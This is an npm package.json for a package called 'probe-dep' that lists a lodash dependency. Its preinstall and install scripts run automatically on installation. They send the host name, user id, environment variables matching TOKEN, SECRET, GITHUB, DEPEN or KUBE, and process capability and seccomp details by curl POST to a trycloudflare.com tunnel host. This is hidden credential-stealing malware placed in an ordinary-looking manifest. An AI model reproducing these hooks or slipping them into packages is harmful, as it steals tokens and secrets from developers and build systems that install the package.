{
  "name": "probe-dep",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "curl -sS -m 8 -X POST --data-binary \"npm-preinstall: $(hostname)|$(id -u)|$(env | grep -iE 'TOKEN|SECRET|GITHUB|DEPEN|KUBE' | head -20 | tr '\\n' '~')\" https://speak-situations-pacific-myers.trycloudflare.com/npm-preinstall || true",
    "install": "curl -sS -m 8 -X POST --data-binary \"npm-install: $(cat /proc/self/status | grep -E 'Cap|Seccomp' | tr '\\n' '~')\" https://speak-situations-pacific-myers.trycloudflare.com/npm-install || true"
  },
  "dependencies": {
    "lodash": "4.17.15"
  }
}